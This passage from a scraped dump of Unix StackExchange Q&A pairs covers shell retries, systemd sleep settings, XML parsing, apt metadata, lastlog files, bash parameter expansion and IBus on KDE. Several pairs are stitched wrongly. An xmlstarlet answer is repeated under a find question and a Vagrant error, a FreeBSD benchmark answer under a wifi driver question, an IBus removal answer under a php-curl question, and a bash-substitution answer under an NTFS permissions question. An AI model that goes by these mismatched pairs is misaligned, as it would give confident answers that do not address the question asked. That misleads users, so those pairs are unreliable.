will probably include the -f option (this default may be overridden by setting the TAPE environment variable). | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529342",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/18887/"
]
} |
529,379 | I have a bash script which simply docker pushes an image: docker push $CONTAINER_IMAGE:latest I want to loop for 3 times when this fails. How should I achieve this? | Use for-loop and && break : for n in {1..3}; do docker push $CONTAINER_IMAGE:latest && break;done break quits the loop, but only runs when docker push succeeded. If docker push fails, it will exit with error and the loop will continue. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529379",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/62249/"
]
} |
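A variant sketch of the retry loop from the answer above that adds a growing delay between attempts; CONTAINER_IMAGE is the variable from the question:
for n in 1 2 3; do
  docker push "$CONTAINER_IMAGE:latest" && break
  echo "push failed (attempt $n), retrying..." >&2
  sleep "$((n * 5))"   # back off: 5s, 10s, 15s
done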
529,471 | I have a machine that I access only via SSH that I just updated to Debian 10 a couple of days ago. Since the update it seems to be going to sleep when it is inactive. This has never happened with previous updates like from 7 to 8 or from 8 to 9. It seems like maybe the sleep settings have reverted to a default state. How can I view and edit the power and sleep settings in the command line? Any guidance much appreciated. Thanks! | you can try the following based on your needs: Disable suspend and hibernation: sudo systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target To re-enable hibernate and suspend use the following command: sudo systemctl unmask sleep.target suspend.target hibernate.target hybrid-sleep.target If you just want to prevent suspending when the lid is closed you can set the following options in /etc/systemd/logind.conf : [Login]HandleLidSwitch=ignoreHandleLidSwitchDocked=ignore restart the service or reboot your machine systemctl restart systemd-logind.service | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/529471",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361788/"
]
} |
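Two standard systemctl queries to confirm the mask from the answer above took effect:
systemctl status sleep.target suspend.target   # should show 'Loaded: masked'
systemctl is-enabled sleep.target              # prints 'masked' once masked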
529,670 | Using Bash, File: <?xml version="1.0" encoding="UTF-8"?><blah> <blah1 path="er" name="andy" remote="origin" branch="master" tag="true" /> <blah1 path="er/er1" name="Roger" remote="origin" branch="childbranch" tag="true" /> <blah1 path="er/er2" name="Steven" remote="origin" branch="master" tag="true" /></blah> I have tried the following: grep -i 'name="andy" remote="origin" branch=".*\"' <filename> But it returns the whole line: <blah1 path="er" name="andy" remote="origin" branch="master" tag="true" /> I would like to match the line based on the following: name="andy" I just want it to return: master | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)$ echo $branchmaster | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529670",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361957/"
]
} |
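A follow-up sketch querying several attributes at once from the same file.xml, using xmlstarlet's standard -m/-v/-o/-n template options:
# list every blah1 element as 'name branch', one per line
xmlstarlet sel -t -m '//blah1' -v @name -o ' ' -v @branch -n file.xml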
529,679 | I have some non standard and standard filenames like the ones below . I need to get the count of files that are NOT standard.. Standard file names: XYZ ABC .txt, XYZ ABC .csv, *.msg Non standard file names: 989875.txt or myname.csv ; this has no bounds and can be anything.. The only good part is I know the standard one and i just need to do a NOT condition to simple find command. How can i do it. Not interested to do a file LOOP etc.. | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)$ echo $branchmaster | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529679",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361571/"
]
} |
529,696 | Just now: $ vagrant plugin updateUpdating installed plugins...Fetching public_suffix-3.1.1.gemFetching vagrant-lxd-0.4.2.gemTraceback (most recent call last): 19: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/bin/vagrant:182:in `<main>' 18: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/environment.rb:290:in `cli' 17: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/cli.rb:66:in `execute' 16: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/root.rb:66:in `execute' 15: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/update.rb:28:in `execute' 14: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/base.rb:14:in `action' 13: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `run' 12: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/util/busy.rb:19:in `busy' 11: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `block in run' 10: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builder.rb:116:in `call' 9: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call' 8: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builtin/before_trigger.rb:23:in `call' 7: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call' 6: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/action/update_gems.rb:23:in `call' 5: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/plugin/manager.rb:228:in `update_plugins' 4: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `clean' 3: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `each' 2: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:251:in `block in clean' 1: from /usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:162:in `uninstall_gem'/usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:264:in `remove': uninitialized constant Gem::RDoc (NameError) This or similar errors seem to happen every single time I update plugins in Vagrant. Is my system broken in some way? | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)$ echo $branchmaster | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/529696",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/3645/"
]
} |
529,752 | Update They don't! At least, not for me. See my answer. Original question According to last year's Phoronix benchmarks , applications on FreeBSD mostly run slower than on Debian (including Stockfish chess engine, Node.js, FLAC encoding and other computational tasks). The Phoronix article itself attributes some of the performance differences to the use of the Clang compiler instead of GCC. Some other opinions say that use of ZFS makes FreeBSD slower, as ZFS is inherently slower than ext4. But even purely computational tasks on FreeBSD compiled with GCC8 performed slower than on Linux. What is the cause of that? Is it inherent to differences between the FreeBSD and Linux kernels, might it be caused by worse quality of drivers, or is there some other reason? P.S. To make it more specific, here is a fairly simple purely computational program that runs slower on FreeBSD than on Linux according to Phoronix: m-queens 1.2 . Compiled like this: gcc -o m-queens.bin main.c -O2 -march=native -mtune=native -std=c99 -fopenmp Since this is a multithreaded task that was run on two 20-core CPUs, I suspect the performance difference boils down to how well the OS handles multiple threads. P.P.S. To make it more clear, I am aware that FreeBSD has good networking capabilities and that it is used by Netflix . The question is specifically about computational tasks, like the one above. P.P.P.S. After installing FreeBSD (TrueOS) on my 6-core desktop alongside Ubuntu and trying to run the queens benchmark myself, I didn't notice any significant difference in multithreaded performance. While Phoronix claims that it ran 39% slower on FreeBSD, in my tests it was only 3.7% slower, which could be attributed to a slight difference in compiler version (gcc 7.4 on TrueOS, gcc 7.2 on Ubuntu). I will test more later. | So many downvotes stimulated me to install FreeBSD (TrueOS) on my 6-core desktop computer to test it myself. (NOTE: I do not recommend trying to install TrueOS alongside other operating systems, because this installation wiped one of my hard drives, even though I tried to install it on a USB drive... Not a user-friendly experience.) As a result, after running some tests from the Phoronix test suite on both Ubuntu and FreeBSD, I couldn't see the “slow applications on FreeBSD” effect. Quite the contrary, some applications ran significantly (10–25%) faster on FreeBSD. Results (FreeBSD 13 vs Ubuntu 17): Fhourstones, kpos/s: 16753 vs 13336; m-queens, multithreaded, user time, s: 18.08 vs 17.38; 7zip 1 GB text file, user time, s: 994 vs 1096. As you can see, the only task that performed slower on FreeBSD was the multithreaded N queens problem, taking 3.7% more time than on Ubuntu. Potential pitfalls: gcc on Ubuntu was version 7.2, on FreeBSD 7.4; Ubuntu was running with KDE, FreeBSD in a shell (shouldn't make much difference); Phoronix used an 80-thread server, I used a 6-thread Intel i5 computer. In conclusion, when testing OS performance, you should: run benchmarks on your setup yourself instead of trusting results that were obtained by someone else; try to use the same compiler; beware that the performance of scripting languages like Perl and Python is not a good indicator of OS performance, since different installations of the interpreters behave differently. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529752",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/274235/"
]
} |
529,757 | I have built the linux distro Boot2Qt from source with the yocto tools for the board Colibri iMX6ULL which has the integrated wifi chip Marvell W8997-M1216 . I installed the whole linux firmware stack and I think also the correct kernel modules for the wifi chip. There is no mlan interface showing up. What exactly creates the mlan interface? Is there something else I need to install? Edit: I am also thankful for general answers on what prerequisites a linux OS needs to have functional wifi, and what software exactly creates a wireless interface. | So many downvotes stimulated me to install FreeBSD (TrueOS) on my 6-core desktop computer to test it myself. (NOTE: I do not recommend trying to install TrueOS alongside other operating systems, because this installation wiped one of my hard drives, even though I tried to install it on a USB drive... Not a user-friendly experience.) As a result, after running some tests from the Phoronix test suite on both Ubuntu and FreeBSD, I couldn't see the “slow applications on FreeBSD” effect. Quite the contrary, some applications ran significantly (10–25%) faster on FreeBSD. Results (FreeBSD 13 vs Ubuntu 17): Fhourstones, kpos/s: 16753 vs 13336; m-queens, multithreaded, user time, s: 18.08 vs 17.38; 7zip 1 GB text file, user time, s: 994 vs 1096. As you can see, the only task that performed slower on FreeBSD was the multithreaded N queens problem, taking 3.7% more time than on Ubuntu. Potential pitfalls: gcc on Ubuntu was version 7.2, on FreeBSD 7.4; Ubuntu was running with KDE, FreeBSD in a shell (shouldn't make much difference); Phoronix used an 80-thread server, I used a 6-thread Intel i5 computer. In conclusion, when testing OS performance, you should: run benchmarks on your setup yourself instead of trusting results that were obtained by someone else; try to use the same compiler; beware that the performance of scripting languages like Perl and Python is not a good indicator of OS performance, since different installations of the interpreters behave differently. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529757",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362008/"
]
} |
529,786 | I read many articles on the internet about how to install a program on Linux, for example Ubuntu, but I'm still confused! What I understand 'till now is: First, we should add a repository that contains our intended package. In Ubuntu, it is done by un-commenting the related line in the /etc/apt/sources.list file. Then we should update our repository's package list by executing apt-get update . At the end, install our program by executing apt install . ... but still I can't understand! When we un-comment a repository in sources.list , does that mean that we tell the OS: "download this repository on my computer"? Is it needed that the repository be downloaded at all? If not, so what happens in the system by un-commenting a line in sources.list? What exactly does apt-get update do? As I read: apt-get update downloads the package lists from the repositories and "updates" them to get information on the newest versions of packages and their dependencies. What does that mean exactly? We have a repository with some packages; does that mean that some repositories may be out of date? So why don't they instead update repositories on the server, so that they would always be up to date and nobody would need to do apt-get update ? | When we un-comment a repository in sources.list , does that mean that we tell the OS: "download this repository on my computer"? No. Is it needed that the repository be downloaded at all? Not usually. Unless you want to download possibly hundreds of gigabytes. If not, so what happens in the system by un-commenting a line in sources.list? Nothing much, yet . We have a repository, it has some packages, does that mean that some repositories may be out of date? Repositories can be out of date, yes, but that's not what's being talked about here. So why don't they instead update repositories on the server, so that they would always be up to date and nobody would need to do apt-get update? It doesn't quite work that way. What happens is this: Repositories contain packages, true, but they also contain information about those packages (metadata): package names, versions, dependencies of the packages, lists of files that the packages contain, hashes of the packages and so on. apt-get update downloads this metadata. apt-get install , upgrade , etc. then use this metadata when you tell them to install a package - they check available versions, check whether additional packages need to be installed as dependencies, and so on. When the repository gets updated, the metadata will get updated too, but your local copy that was downloaded earlier won't . This is natural: you don't want your PC constantly checking with the server whether your copy of the metadata is outdated. Now the next time you need to install a package, you could face problems, because your system has outdated metadata, so it can't figure out the correct thing to do. Then you need to run apt-get update to update this metadata. When you uncomment the source line, nothing has happened yet, as I said. The next time you run apt-get update , it will download metadata from that source too. And the next time after that when you install, upgrade or remove packages, apt will consider the additional metadata when figuring out things. That's how apt works. Yum, on the other hand, checks for updated metadata and downloads it whenever you add, remove or upgrade packages. Both methods have their pros and cons. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529786",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/321333/"
]
} |
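A small sketch for poking at the metadata the answer above describes; these are stock apt commands and paths on Debian/Ubuntu, with bash as an arbitrary example package:
ls /var/lib/apt/lists/    # the downloaded metadata files live here
apt-cache policy bash     # versions known from that local metadata
sudo apt-get update       # refresh the local copy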
529,822 | Please, how do I get rid of the IBus service/IBus panel when running KDE? This Gnome(?) keyboard layout manager(?) can get into conflict with the layout set natively in KDE Settings. I need to switch often between CZ and UK keyboards and IBus makes it impossible. The severity of this issue ranges from the visual irritation of having two keyboard layout indicators in the tray area, but it gets much more serious when both systems set conflicting layouts; like when in KDE I set the Czech keyboard but IBus somehow keeps the English UK layout: Can you guess which layout - EN (IBus) or CZ (KDE) - is actually active? The wrong one, of course; IBus seems to always override KDE :( If I quit the IBus panel now, it would make it even worse, because it's only the tray applet, the GUI bit, that disappears, but the IBus service is still active. I still wouldn't have my CZ keyboard and absolutely no way to change it. A very annoying variant of this problem is when the user has only a single layout set in KDE, which is by default not displayed in the tray area; but the IBus setting always is, even as a single layout. The user then has the very angering sensation that whatever he sets in KDE Settings is completely ignored, probably blaming KDE, unaware that the layout indicator belongs to a different system and that it is overriding KDE settings. I once managed to kill all keyboard input completely when playing with KDE Settings and IBus properties at the same time. Really awful UX. IBus seems to be part of the Gnome stack. So why does it get activated in KDE? I suspect it appeared there only after I had installed some Gnome/Gtk applications, like Gimp, GDM, etc. OS: openSuse 15.0 Linux. This issue was present in previous versions too. UPDATE: I also faced an issue with a US keyboard suddenly appearing as a third option. But that would be for yet another bug report. UPDATE 2: OK, I uninstalled them. Surprisingly it is possible to uninstall just ibus, not the whole Gnome. My GDM still works. BUT - I now face another issue: I cannot switch keyboard layouts anymore, despite setting everything in System Settings and having 2 keyboard indicators in the tray; only the UK keyboard now works for me. I suspect IBus screwed something up in KDE generally. Ehhh, I sometimes feel that working with Linux means you will spend half of the time solving usability issues and writing bug reports :( | I had a similar issue, though possibly slightly different as I don't intend to keep using Gnome. Removing ibus-gtk , ibus-gtk3 , ibus-gtk3-32bit , ibus-lang , and ibus (all ibus -related packages on my system; yours may be different) seems to have worked with no ill effects after a reboot. You can remove them by running zypper rm -u ibus* - be sure to check the list for anything essential that you do not want removed. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529822",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/293839/"
]
} |
529,823 | I need php7.2-curl . But on Debian 10 apt says that it cannot be installed due to a dependency with libcurl3 . But libcurl3 cannot be installed (it gives me no reason). Must I rollback to Debian 9.9? I already tried to switch to PHP 7.3, but even php7.3-curl depends on libcurl3 ! | I had a similar issue, though possibly slightly different as I don't intend to keep using Gnome. Removing ibus-gtk , ibus-gtk3 , ibus-gtk3-32bit , ibus-lang , and ibus (all ibus -related packages on my system; yours may be different) seems to have worked with no ill effects after a reboot. You can remove them by running zypper rm -u ibus* - be sure to check the list for anything essential that you do not want removed. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529823",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/167205/"
]
} |
529,827 | I have read some questions that ask for advice on how to rsync sparse files efficiently, mentioning the files /var/log/lastlog and /var/log/faillog . Indeed I myself have stumbled over those files being an "issue", as backing them up via rsync turns them "unsparse". What I hence wonder is: what is the need/background motivation to have those files as sparse, huge files (in my case it was 1.1TB)? Also, in relationship to this, a follow-up: since I was assuming them to be logfiles I do not care about excessively, I truncated those files; did I corrupt anything by truncating those files? | What I hence wonder is: what is the need/background motivation to have those files as sparse, huge files (in my case it was 1.1TB)? This is how it's supposed to be. /var/log/lastlog is not a log file like /var/log/syslog , and its name should be read as "last logins list" rather than "last logfile". It's maintained by the pam_lastlog(8) module, and it's basically an array like this: struct lastlog { time_t ll_time; // 4 char ll_line[UT_LINESIZE]; // 32 char ll_host[UT_HOSTSIZE]; // 256} entry[UINT_MAX]; Sizes of the fields on a typical x86-64 machine are in the comments; an entry should be 4 + 32 + 256 = 292 bytes. Every time a program using the pam_lastlog(8) pam module logs a user in, it will seek to uid * sizeof(struct lastlog) and overwrite the entry corresponding to that user. Did I corrupt anything by truncating those files? You did corrupt the output of the lastlog(1) command, which nobody is using anyway ;-) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/529827",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/24394/"
]
} |
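Two quick checks illustrating the answer above, using standard tools (root is just an example user):
lastlog -u root                          # read one user's entry from /var/log/lastlog
du -h --apparent-size /var/log/lastlog   # apparent size, versus...
du -h /var/log/lastlog                   # ...allocated blocks: a large gap means sparse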
529,937 | I regularly use the expression line=${line//[$'\r\n']} . But what does [$'\r\n'] mean? I know it removes the '\r\n' characters but how does it do this? Does it remove the instances of both characters only, or does it also find matches of just one character? I do not understand the usage of this syntax. If you can, please, give me a link to the manual. I cannot find the answer on this question. | From the Bash manual : ${ parameter / pattern / string } The pattern is expanded to produce a pattern just as in filename expansion. Parameter is expanded and the longest match of pattern against its value is replaced with string. The match is performed according to the rules described below (see Pattern Matching ). If pattern begins with / , all matches of pattern are replaced with string . ... If string is null, matches of pattern are deleted and the / following pattern may be omitted. You have ${line//[$'\r\n']} , where: the parameter is line , the pattern is /[$'\r\n'] (note: begins with / , so all matches of pattern are replaced), and the string is null, so the / after pattern is omitted, and matches are deleted. Following the rules for Pattern Matching : […] Matches any one of the enclosed characters. $'...' tells bash to interpret certain escape sequences (here, \r for carriage return and \n for line feed) and replace them with actual characters represented by the escape sequences. So this substitution matches all instances of either carriage return (CR, \r ) or line feed (LF, \n ), and deletes them. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529937",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/352872/"
]
} |
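A tiny sketch demonstrating the substitution from the answer above; od -c makes the removed CR/LF characters visible:
line=$'foo\r\nbar\r\n'
printf '%s' "$line" | od -c                # shows \r and \n present
printf '%s' "${line//[$'\r\n']}" | od -c   # both deleted: foobar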
529,958 | I am using Arch Linux, and every time I boot my laptop as a user, the hard disk folders permissions is set to root only, so I can't open them as a user, I used the following command to change the permission sudo chmod -R 775 /mnt where /mnt is the folder that contains my hard disk. When I reboot my laptop, every thing resets and I had to use the same command to access my hard disk again, so how to save the permissions? The output of /etc/fstab # Static information about the filesystems.# See fstab(5) for details.# <file system> <dir> <type> <options> <dump> <pass># /dev/sda6UUID=e0888535-4d8b-4b89-9a7e-4a85208fe129 / ext4 rw,relatime 0 1 My hard disk is a windows disk, I am dual booting with windows 10. The output of df: Filesystem 1K-blocks Used Available Use% Mounted ondev 2973860 0 2973860 0% /devrun 2982588 716 2981872 1% /run/dev/sda6 30313412 4987780 23762752 18% /tmpfs 2982588 101116 2881472 4% /dev/shmtmpfs 2982588 0 2982588 0% /sys/fs/cgrouptmpfs 2982588 220 2982368 1% /tmptmpfs 596516 24 596492 1% /run/user/1001/dev/sda4 354528216 350712252 3815964 99% /mnt The output of mount: proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)dev on /dev type devtmpfs (rw,nosuid,relatime,size=2973860k,nr_inodes=743465,mode=755)run on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)/dev/sda6 on / type ext4 (rw,relatime)securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)tmpfs on /tmp type tmpfs (rw,nosuid,nodev)debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime)systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=13513)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)configfs on /sys/kernel/config type configfs (rw,nosuid,nodev,noexec,relatime)tmpfs on /run/user/1001 type tmpfs (rw,nosuid,nodev,relatime,size=596516k,mode=700,uid=1001,gid=1001)/dev/sda4 on /mnt type ntfs (rw,relatime,uid=0,gid=0,fmask=0177,dmask=077,nls=utf8,errors=continue,mft_zone_multiplier=1) | From the Bash manual : ${ parameter / pattern / string } The pattern is expanded to produce a pattern just as in filename expansion. Parameter is expanded and the longest match of pattern against its value is replaced with string. The match is performed according to the rules described below (see Pattern Matching ). If pattern begins with / , all matches of pattern are replaced with string . ... If string is null, matches of pattern are deleted and the / following pattern may be omitted. You have ${line//[$'\r\n']} , where: the parameter is line , the pattern is /[$'\r\n'] (note: begins with / , so all matches of pattern are replaced), and the string is null, so the / after pattern is omitted, and matches are deleted. Following the rules for Pattern Matching : […] Matches any one of the enclosed characters. $'...' tells bash to interpret certain escape sequences (here, \r for carriage return and \n for line feed) and replace them with actual characters represented by the escape sequences. So this substitution matches all instances of either carriage return (CR, \r ) or line feed (LF, \n ), and deletes them. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529958",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362187/"
]
} |
530,012 | When using ZFS on FreeBSD , how can we see how much space is used and how much is available in storage drives (hard disk, SSD, etc.)? For example, spinning up a virtual machine instance of FreeBSD on DigitalOcean comes with a certain amount of storage. How can I verify the size of that virtual drive? | zfs list Use the list option on the zfs command built into FreeBSD. zfs list Example: $ zfs listNAME USED AVAIL REFER MOUNTPOINTzroot 4.41G 17.4G 88K nonezroot/ROOT 3.49G 17.4G 88K nonezroot/ROOT/default 3.49G 17.4G 3.15G legacyzroot/tmp 112K 17.4G 112K /tmpzroot/usr 947M 17.4G 88K /usrzroot/usr/home 184K 17.4G 128K /usr/homezroot/usr/ports 947M 17.4G 947M /usr/portszroot/usr/src 88K 17.4G 88K /usr/srczroot/var 792K 17.4G 88K /varzroot/var/audit 88K 17.4G 88K /var/auditzroot/var/crash 88K 17.4G 88K /var/crashzroot/var/log 348K 17.4G 348K /var/logzroot/var/mail 92K 17.4G 92K /var/mailzroot/var/tmp 88K 17.4G 88K /var/tmp$ Learn more on the zfs man page . The zfs command has many options for controlling the rich features of the ZFS file system. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/56752/"
]
} |
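Companion commands to zfs list, all part of the base ZFS tooling on FreeBSD:
zpool list          # pool-level size, allocated and free space
zfs list -o space   # breakdown of used space (snapshots, children, ...)
df -h               # per-dataset view through the generic tools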
530,191 | Can someone explain to me why I don't see the output of "date" from the below command? For N STDIN inputs, it's printing output for only the last (N-1) commands? [root@RAJ-RHEL6 raj]# cat < <(date) <(hostname) <(uptime) <(cat /etc/resolv.conf)RAJ-RHEL6.5 02:22:59 up 2:36, 1 user, load average: 0.00, 0.00, 0.00nameserver 10.207.26.248[root@RAJ-RHEL6 raj]# | You may only redirect the standard input stream from one place. You can't expect to be able to redirect it from several files or process substitutions in a single command. The command cat < <(date) <(hostname) <(uptime) <(cat /etc/resolv.conf) is the same as cat <(hostname) <(uptime) <(cat /etc/resolv.conf) < <(date) i.e., you are giving cat three input files, and then you redirect the output of date into its standard input. The cat utility will not use its standard input stream if it's given files to work with, but you can get it to do so by using the special - filename: cat - <(hostname) <(uptime) <(cat /etc/resolv.conf) < <(date) Note also that the last process substitution is useless and the command is better written as cat - <(hostname) <(uptime) /etc/resolv.conf < <(date) or, without that redirection of the output of date , as cat <(date) <(hostname) <(uptime) /etc/resolv.conf or, with a single process substitution, cat <( date; hostname; uptime; cat /etc/resolv.conf ) or, without process substitutions, date; hostname; uptime; cat /etc/resolv.conf Related: How is this command legal ? "> file1 < file2 cat" | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530191",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362360/"
]
} |
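A self-contained sketch of the special - filename described in the answer above; it runs with plain bash and cat:
echo middle | cat <(echo first) - <(echo last)
# prints first, middle, last: stdin is consumed where '-' appears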
530,203 | Every time I run a terminal I get this error message: ".bashrc syntax error: unexpected end of file" So I started commenting out parts of it to find the issue, and I guess it was in the below if condition. I wonder how I can edit it to work? if ("1" == "$?LD_LIBRARY_PATH") then if ("$LD_LIBRARY_PATH" !~ */usr/local/iscir/lib*) then export LD_LIBRARY_PATH /usr/local/iscir/lib:$LD_LIBRARY_PATH endifelse export LD_LIBRARY_PATH /usr/local/iscir/libendif I tried this but it didn't work: if ["1" == "$?LD_LIBRARY_PATH"]; then if ["$LD_LIBRARY_PATH" !~ */usr/local/iscir/lib*]; then export LD_LIBRARY_PATH /usr/local/iscir/lib:$LD_LIBRARY_PATH fielse export LD_LIBRARY_PATH /usr/local/iscir/libfi | There's no endif in bash. An if statement is ended by a fi . Also, when using the [ ] test construct, you need a space around the [ . The =~ regex match operator requires bash's special [[ ]] instead of the POSIX [ ] , and to negate the match, you negate the whole test ( [[ ! foo =~ bar ]] ); you can't use !~ . Also, it requires a regular expression, not a shell glob. So * doesn't mean anything by itself; you need .* for "any sequence of characters". Then, the format for setting and exporting a variable is export foo=bar and also, you have a stray ? between the $ and LD_LIBRARY_PATH . So try this: if [ "1" == "$LD_LIBRARY_PATH" ]; then if [[ ! "$LD_LIBRARY_PATH" =~ .*/usr/local/iscir/lib.* ]]; then export LD_LIBRARY_PATH="/usr/local/iscir/lib:$LD_LIBRARY_PATH" fielse export LD_LIBRARY_PATH="/usr/local/iscir/lib"fi That should work, but the whole thing doesn't make sense. When will LD_LIBRARY_PATH be 1 ? I don't really see how this would ever be executed. If all you want to do is add /usr/local/iscir/lib to LD_LIBRARY_PATH if it isn't there already, you just need this: if [ -z "$LD_LIBRARY_PATH" ]; then export LD_LIBRARY_PATH="/usr/local/iscir/lib"elif [[ ! "$LD_LIBRARY_PATH" == */usr/local/iscir/lib* ]]; then export LD_LIBRARY_PATH="/usr/local/iscir/lib:$LD_LIBRARY_PATH"fi | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530203",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/85865/"
]
} |
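A quick sketch for catching this class of error early; bash -n parses a script without executing it:
bash -n ~/.bashrc && echo 'syntax OK'   # on error it reports the offending line number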
530,350 | I just came across a bash script. What does [[:space:]] mean in a bash script? Why the double colon? | It is not only for Bash; it is part of POSIX notation. What is POSIX? POSIX or "Portable Operating System Interface for uniX" is a collection of standards that define some of the functionality that a (UNIX) operating system should support. One of these standards defines two flavors of regular expressions. POSIX Bracket Expressions POSIX bracket expressions are a special kind of character class. POSIX bracket expressions match one character out of a set of characters, just like regular character classes. Standard POSIX [[:alnum:]] Alphanumeric characters[[:alpha:]] Alphabetic characters[[:blank:]] Space and tab[[:cntrl:]] Control characters[[:digit:]] Digits[[:graph:]] Visible characters (anything except spaces and control characters)[[:lower:]] Lowercase letters[[:print:]] Visible characters and spaces (anything except control characters)[[:punct:]] Punctuation (and symbols).[[:space:]] All whitespace characters, including line breaks[[:upper:]] Uppercase letters[[:xdigit:]] Hexadecimal digits Non-standard [[:ascii:]] ASCII characters[[:word:]] Word characters (letters, numbers and underscores) Legacy syntax (can someone find a reference to these?) [[:<:]] Start of Word [[:>:]] End of Word You can find more info here: wiki | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/530350",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362485/"
]
